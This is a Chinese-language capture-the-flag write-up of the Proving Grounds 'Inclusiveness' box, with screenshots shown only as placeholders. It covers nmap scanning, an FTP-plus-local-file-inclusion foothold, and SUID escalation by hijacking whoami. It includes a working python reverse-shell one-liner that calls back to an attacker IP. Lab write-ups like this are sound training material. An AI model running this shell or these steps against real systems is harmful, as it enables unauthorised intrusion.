PG::Inclusiveness

nmap -Pn -p- -T4 --min-rate=1000 192.168.134.14
image.png
nmap -Pn -p 21,22,80 -sCV 192.168.134.14
image.png
80端口是默认页面,先查看21端口FTP服务的匿名登录,并未发现可利用信息。
继续查看80端口,在robots.txt中得到提示。
image.png
https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/
image.png
得到一个路径 /secret_information
image.png
得到一个本地文件包含漏洞
image.png
结合ftp服务,应该是包含ftp服务的内容
image.png
image.png
上传shell至ftp
image.png
image.png
反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

image.png
查看SUID时,发现一个可能存在利用的地方
image.png
查看时,发现源代码
image.png
程序的大致意思是运行whoami检测用户身份,如果是Tom,则rootshell程序会给一个更高权限的用户。
所以只需要劫持whoami,让它输出Tom就可以了。
image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值